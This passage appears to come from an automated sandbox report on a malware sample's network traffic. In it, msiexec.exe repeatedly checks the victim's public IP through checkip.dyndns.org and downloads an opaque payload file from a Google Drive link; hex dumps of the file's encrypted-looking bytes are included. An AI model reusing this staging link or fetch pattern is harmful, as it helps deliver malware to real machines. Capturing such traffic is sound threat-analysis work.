                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 20, 2024 10:10:53.391855955 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:53 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: 0850502604c243388d9fb867f5e40552
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.749978193.122.130.0802500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 20, 2024 10:10:54.048418999 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 20, 2024 10:10:54.506896973 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:54 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: e1c73ef18be01aa1c03131745db3b9b5
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.749980193.122.130.0802500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 20, 2024 10:10:55.184561968 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 20, 2024 10:10:57.668148994 CET730INHTTP/1.1 502 Bad Gateway
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:57 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 547
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-Request-ID: a2942662461ba63971777a009da562e2
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.749981193.122.130.0802500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 20, 2024 10:10:57.678512096 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 20, 2024 10:10:59.140129089 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:59 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: 5efe864dc1822cfd08a18541a686434f
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.749983193.122.130.0802500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 20, 2024 10:10:59.764533043 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 20, 2024 10:11:01.663237095 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:11:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: 76859f9a9c233e1499564b6a1b4531c2
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.749971172.217.23.1104432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:36 UTC216OUTGET /uc?export=download&id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                    Host: drive.google.com
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2024-11-20 09:10:37 UTC1766INHTTP/1.1 303 See Other
                                                                                                                                    Content-Type: application/binary
                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:36 GMT
                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download
                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                    Content-Security-Policy: script-src 'nonce-mVXcCRc0tMXJP_-LcFP0vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                    Server: ESF
                                                                                                                                    Content-Length: 0
                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749972142.250.186.334432500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-20 09:10:37 UTC258OUTGET /download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-11-20 09:10:40 UTC4920INHTTP/1.1 200 OK
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Content-Disposition: attachment; filename="UfxJGCyOfem181.bin"
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Content-Length: 275520
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 12:34:37 GMT
                                                                                                                                    X-GUploader-UploadID: AFiumC5QwFwi2yiiaRolp-u2u42vUgBqTGhvN5kXTPoahS0bTskz2fI1AWNVlSwkFbCG-iu6Sr7cgQZuNg
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:40 GMT
                                                                                                                                    Expires: Wed, 20 Nov 2024 09:10:40 GMT
                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                    X-Goog-Hash: crc32c=GBXpAw==
                                                                                                                                    Server: UploadServer
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
                                                                                                                                    2024-11-20 09:10:40 UTC4920INData Raw: 8c 1a 63 86 0f 3d fa 1a 0c 24 c8 b9 ee 3f db fa 2b c2 6e 9e bf 58 1d 25 bf 49 93 32 9a 9c 9d c9 a3 06 c9 47 5f ed 76 0a b0 f9 bc 18 1f 1f b2 f9 96 7a 31 86 6a 7d ea 22 a1 c7 07 93 87 85 28 6d 03 e4 57 ad 71 91 20 be 01 e2 de 24 c1 02 7f 6e dc e1 d2 f4 1c 3b 87 a9 5d e9 19 62 51 d6 b3 1e 51 b7 be 69 ab fb 9c 9a e2 4d 5d 98 b1 dc 7a c8 03 13 db d0 ac e6 11 f7 a8 b9 aa e0 e7 00 53 4a 22 51 b2 fc 72 6e ae 7a 2d 82 73 88 ab 2f 6a 38 a0 67 a5 6e 48 4e 8a a6 a4 99 64 08 fc 5c 0b b7 4c 74 d9 e2 24 ed 80 98 ca 92 96 79 04 63 9c ff cd f0 8d 11 f0 36 26 63 4f 8a cb de 69 16 0d 2b 5a d1 b3 66 01 04 ee ba 24 08 8b b3 ba 5e e6 3a f2 dd 0c 1a 4b e6 6d b3 79 a2 b6 88 0b f7 68 1a a6 da 50 04 7a 63 28 7e 38 b0 e8 16 c4 76 d7 05 20 4b ad a7 44 1f ea 26 9d 30 6e 74 bd ab a0
                                                                                                                                    Data Ascii: c=$?+nX%I2G_vz1j}"(mWq $n;]bQQiM]zSJ"Qrnz-s/j8gnHNd\Lt$yc6&cOi+Zf$^:KmyhPzc(~8v KD&0nt
                                                                                                                                    2024-11-20 09:10:40 UTC4862INData Raw: 60 b9 81 6a 07 79 77 bb 90 25 35 ac 87 14 c8 20 40 f9 cf af 93 53 6a 25 9e 58 ab 8a 07 b6 36 79 94 a9 7f 8a 9b 00 74 25 53 15 f4 d8 a4 78 d8 48 7e 77 d1 70 c3 87 3b 65 5c b6 6f c7 63 d7 ad 51 7e ec b9 d4 0e a9 d8 c1 29 2f 29 84 62 f9 9c 6b 43 6a c0 39 21 53 4e f0 39 34 ab b4 ab 68 1b b7 78 ac 6d 8b f7 2e 65 45 59 2e e8 14 26 4e cd d7 b4 53 68 3a 28 a6 41 8c aa c9 d0 ad d4 10 9b 78 c4 fa 87 e7 b5 54 a4 d7 03 24 90 d4 8a d9 dc 0c bf 9e e3 87 02 3e 0f 9e 27 d4 5f e6 7e 89 a9 d9 61 d1 03 7a 90 d4 2d 0e 20 e8 f7 b2 25 8d a6 fe 03 45 ac 6b 6e 61 d8 b5 20 8b 6d be f1 a8 c4 93 04 4e 68 52 51 bf 69 7a 40 77 82 f0 72 16 99 4c 57 d5 81 ce 35 6c d4 9a 6d 4f 80 f7 8b 5d 5f 95 ee e4 cd e8 eb cd 86 6f a3 96 64 34 a2 38 93 2b 9c 82 07 71 be b2 a0 fa a4 a3 a6 74 4a da f5
                                                                                                                                    Data Ascii: `jyw%5 @Sj%X6yt%SxH~wp;e\ocQ~)/)bkCj9!SN94hxm.eEY.&NSh:(AxT$>'_~az- %Ekna mNhRQiz@wrLW5lmO]_od48+qtJ
                                                                                                                                    2024-11-20 09:10:40 UTC1322INData Raw: bd c4 8e 1f 03 e6 0b 63 1e 5b 9b 79 0c f5 29 31 a0 4b bf 73 3a 6c ae ee c5 89 4c 94 5d ab 5e 27 94 24 e9 f6 e7 dd 67 e5 bf 05 83 9e 2b 59 18 09 24 93 f1 fd a1 d9 d2 ec a9 3a a2 73 2f 5f 51 a7 fd c4 f6 21 50 67 38 c9 8f fb 89 63 ef c8 ed b7 c7 cc 2b 6e 2a 21 dd a0 0b 8d 04 78 9c 02 10 ac fa 60 42 4d 6f 8d d4 18 28 9a af 8f cb b5 62 c9 1a 6b 94 c6 28 fd ab 2e d6 36 22 a2 27 f8 bc 98 d8 91 35 e0 37 e0 a1 dc 16 65 4c e4 52 75 3a b0 e8 16 50 ee fe 53 d7 6d 15 7c 87 5c 65 89 92 12 ca 35 45 8d 19 f7 3f b3 2f f4 24 11 54 b4 1b 96 51 3d 33 61 d2 cc 5c 48 69 86 68 02 1b b3 6e fb 90 29 96 9b 36 ac ea a6 73 e9 d8 0f 08 f1 66 71 0f e4 12 66 65 05 5f 3b 95 1b 8b fa dc 7b 37 42 df eb c2 5a 90 4f 94 ad 7f cb 5d 73 36 21 1c 39 4a 2c 63 61 b6 2f 88 f1 8b fd 8d a8 fb 04 df
                                                                                                                                    Data Ascii: c[y)1Ks:lL]^'$g+Y$:s/_Q!Pg8c+n*!x`BMo(bk(.6"'57eLRu:PSm|\e5E?/$TQ=3a\Hihn)6sfqfe_;{7BZO]s6!9J,ca/
                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: a8 08 5d cf 60 ca 77 d1 7a 63 a2 23 17 bf b8 6f b7 da f2 b4 2f 8e ed b9 d0 a2 8c c2 b3 5b 20 29 f4 c0 dc 87 15 68 6a c0 3d 54 77 52 82 61 3a ab c4 19 40 6e b7 3d a6 02 d6 ec 1e 6c 56 c9 35 65 54 35 4e cc e3 a2 21 f4 4b 28 d6 e9 a2 ba c9 3e ad d4 10 3a 32 80 88 c9 e2 da 40 06 f2 10 5a af cb 9a 50 21 29 a5 ed b7 e1 02 4e a7 b6 55 d3 30 8a 6d ab b5 f6 78 b6 03 70 9a 9b 45 02 20 e2 d3 c5 56 e4 ac fe 09 28 97 6b 7f 61 c1 83 21 03 7f be 8b c5 de 93 15 4f 33 70 51 bf 69 78 64 18 c4 f2 1d 7e b1 72 5d d5 59 c0 eb 6d f7 9e 51 5e 86 92 99 7e 5f b7 8c 38 dc e6 5a a0 86 6f a9 e5 8d 3a a2 2d e4 50 96 93 72 08 97 33 a0 f0 ae 69 86 7b 59 ef e0 38 35 4f c0 1b 4e d2 7e 1b ce 97 e1 25 32 5a 67 56 59 56 79 b4 e0 0c 53 f3 2b 2e ce 1a 5e 50 93 ef 5e 88 aa d3 c4 c1 c4 37 75 53
                                                                                                                                    Data Ascii: ]`wzc#o/[ )hj=TwRa:@n=lV5eT5N!K(>:2@ZP!)NU0mxpE V(ka!O3pQixd~r]YmQ^~_8Zo:-Pr3i{Y85ON~%2ZgVYVyS+.^P^7uS
                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: 83 93 6f b2 78 cc 2e 88 0b e3 6c 64 8d ce 50 00 09 8e 28 7e cc 98 eb 07 c2 39 06 05 20 01 b8 a0 2b cc aa 26 97 10 10 48 bd a9 a4 0a b6 6e 66 f9 d1 f1 e6 e6 1d db c0 30 cf 06 7b b8 3c 8b db dd da b4 34 12 2f 8e 96 cd 58 bb c8 e3 36 22 cc 05 03 84 ee d7 31 7c 29 24 0f 6f 73 08 72 f1 9d 71 4b 31 54 7a 4f 29 f8 da f8 77 ef 20 5b 1a 4f a1 39 73 b5 ec 13 14 c8 3e 32 f4 44 d4 00 a4 a3 0a a4 3e 7a 88 60 fc 80 45 64 54 87 33 d0 c8 78 c6 4f 25 47 96 b6 cd e7 1e de 20 48 84 8b 7d 9b 4e e0 82 a8 4d 3f ef a9 a4 2c 1e 01 83 0a 1e 32 c1 b1 37 c2 0a 75 a1 68 c0 55 d4 0b 7d 02 97 49 6b 9d 29 4c da 7c 74 8a 56 d2 5f 89 85 bb 57 bc fb 5a 43 8c 88 e1 5d de e4 05 06 35 26 0a ce 5c e3 6a 25 66 9b 55 df e2 1a 15 57 e6 02 f9 a4 3a b7 7e b2 b6 81 8f 83 c4 73 4b d7 54 13 1d bc dc
                                                                                                                                    Data Ascii: ox.ldP(~9 +&Hnf0{<4/X6"1|)$osrqK1TzO)w [O9s>2D>z`EdT3xO%G H}NM?,27uhU}Ik)L|tV_WZC]5&\j%fUW:~sKT
                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: 44 5e e9 5e 18 dd d8 27 88 c0 a9 8d 33 70 56 d6 74 88 5d 92 1a 5b 5c 27 90 28 91 f4 e7 a9 03 fc 3c 05 f3 82 15 26 19 02 29 bc 2b fd b2 de d7 3b c5 0a a3 72 07 72 45 59 f1 8b e4 31 56 64 ef 44 8c f1 a1 a3 ca de 99 f3 b4 0e 2f 46 24 32 d5 b7 6c 4a 3e 78 96 74 8b 7b fa 10 60 79 ab 8d de 6c 63 8b a7 e4 26 ff 62 c3 6e 28 8b c6 2c 96 45 64 d6 3c 28 11 3b 9e f2 a0 62 e1 1d 5e 43 63 ab ae 67 79 4c 9c 08 7e 2a b0 92 16 2c ee fe 53 d7 74 63 23 0a 1c 61 f7 d0 37 dc 43 02 3e 19 87 97 f9 85 dc 90 1b 54 96 e3 b3 49 45 60 e3 92 bc fe 6c 55 ee 22 de 0f b7 bc 7c af 4c cc 20 36 dc 42 21 4d 8f 80 41 07 f5 b4 f6 36 8f ec 51 65 75 f9 b1 c5 01 f9 82 bc b3 47 e0 f0 f0 c2 7a 90 4f 94 b1 58 cb 5d 73 87 0d 7e 7a 42 38 67 63 43 05 fd 81 9d df 63 f4 fb 0e c3 9f 95 23 22 85 0a bc 43
                                                                                                                                    Data Ascii: D^^'3pVt][\'(<&)+;rrEY1VdD/F$2lJ>xt{`ylc&bn(,Ed<(;b^CcgyL~*,Stc#a7C>TIE`lU"|L 6B!MA6QeuGzOX]s~zB8gcCc#"C
                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: 87 bc fb e5 07 d4 1a 92 17 89 e1 e8 36 da 30 ae d7 09 1c 54 cb 9a 54 83 0c a9 b7 fa e2 02 34 05 be 20 df 30 80 56 fe a3 de 04 b6 1f f7 da bb 45 0f 05 f4 89 3f 5d e4 d6 d6 48 56 a8 6d dd 40 c7 dc 16 e1 6d ba 59 9e d9 e1 b9 5a 1b 49 79 ff 63 69 40 c4 a1 eb 63 3c 99 4c 59 77 7a da 47 a5 c3 b6 15 fc a3 83 91 d0 1f 9f ee 39 f9 fa f6 fa 96 6f d9 39 9f 2d 8a 9d 96 07 9e 31 27 06 cd e0 b5 f0 d4 dd 5d 63 62 7f f1 1c 13 b1 f8 8c 7c e6 6c 1a 9b 23 bb 64 3d 5a 1d 56 54 34 51 00 ea 1f 47 23 94 23 bc 24 2f 4f e3 4d 7f b9 9d eb c4 cb b2 1d 42 49 6f a3 91 5c c2 ea ba e3 34 16 1d 93 ee 24 1c 14 95 b5 23 b4 13 2c 5d 54 b3 2f c5 1b 9a ce 10 20 a6 8a f1 28 fb 28 30 9d 8f 3b 9e 29 ec a2 9c 0e 10 94 b8 cb c2 40 42 fe a8 ea 5c c5 39 8f d2 d8 45 15 ff 2d 39 51 59 4d ec 4f c6 cd
                                                                                                                                    Data Ascii: 60TT4 0VE?]HVm@mYZIyci@c<LYwzG9o9-1']cb|l#d=ZVT4QG##$/OMBIo\4$#,]T/ ((0;)@B\9E-9QYMO
                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: 3e 3f a3 13 dd 97 c1 ff 05 57 22 2e 0d 63 65 4f da f1 9d 71 96 52 43 72 31 17 f8 da 82 6d 24 20 5f 62 77 6f 39 03 a9 c4 83 1c b6 0e 24 0a 41 b9 3e b5 a6 37 1d 80 7a 88 14 bc 4d 45 60 2c b6 20 d8 a9 68 81 00 25 47 96 a0 22 e0 62 17 31 4e b7 bb 54 ff 4e e0 90 56 95 12 ca 81 96 5f de 0b 90 0a 36 db a3 b1 3d c8 a7 b7 a1 68 ca 38 e6 1a 7a 78 df 1e 69 99 2a 99 f2 fd 7e e5 98 c4 a1 82 96 a1 41 d8 07 91 42 86 f6 a2 76 de e0 6e e8 de 26 00 c4 5e e8 66 49 76 9b 21 85 a4 0a 15 2d 82 5a 68 a4 4a 95 33 4c b7 98 ed 55 c9 4a 98 d7 45 14 16 19 ea dd 63 74 79 94 91 2c f5 ad 13 e6 05 b5 77 b5 9d 74 de 81 93 4b 7c e1 38 21 7a 74 b0 2a da b7 81 57 17 bb f5 52 2b 8c 61 25 28 de 0e 2b 49 2c 8b 1b 51 71 4b 3b 02 4b aa 86 b5 54 d0 f5 79 69 33 c2 e3 45 04 d8 01 88 ff e6 8b 50 f2
                                                                                                                                    Data Ascii: >?W".ceOqRCr1m$ _bwo9$A>7zME`, h%G"b1NTNV_6=h8zxi*~ABvn&^fIv!-ZhJ3LUJEcty,wtK|8!zt*WR+a%(+I,QqK;KTyi3EP
                                                                                                                                    2024-11-20 09:10:40 UTC1390INData Raw: 20 32 d1 13 26 ef 4c 70 8a 06 13 cd d2 15 48 22 a1 e2 88 12 28 81 b4 c2 15 38 22 c3 64 57 b1 d0 5e 88 7a 2e a6 9e 07 a4 07 3e e6 88 d2 43 38 4c 45 ae a4 ae 16 d7 69 8d 04 16 3a b0 e6 db b2 f4 8c 62 d4 7c 6d c3 22 69 65 89 99 24 ff 51 59 f4 19 87 97 96 18 dc 9c 11 54 96 ce b3 49 45 7d 6e ac 83 fe 6d 74 e9 72 70 21 a0 cc ae f4 44 e4 94 32 f4 01 83 68 9d e3 2c 76 b5 c4 54 17 be ac 69 65 73 fd cd f0 3e a3 c4 b3 b3 3d 51 f1 eb 94 04 90 4f 9a 00 b6 cb 5d 79 5b 1f 62 08 4e 5e 30 11 e1 5d 9e a9 1c d5 0c a2 ed f0 c8 81 b8 3b 89 c0 3c ce 70 9c 93 c2 52 5a 02 33 cb 00 4f c3 cc 52 23 5e 2a 74 e0 65 76 79 28 77 33 7a 93 ff c0 43 ad b2 bd 57 cb 68 3a db ee ea fc c7 60 14 7a a2 db db 63 0d 8c 37 03 d4 6b 11 d7 80 6b a1 e1 c3 32 ca 1a 91 bd 29 27 7d 4d 04 ff c4 22 7a 09
                                                                                                                                    Data Ascii: 2&LpH"(8"dW^z.>C8LEi:b|m"ie$QYTIE}nmtrp!D2h,vTies>=QO]y[bN^0];<pRZ3OR#^*tevy(w3zCWh:`zc7kk2)'}M"z
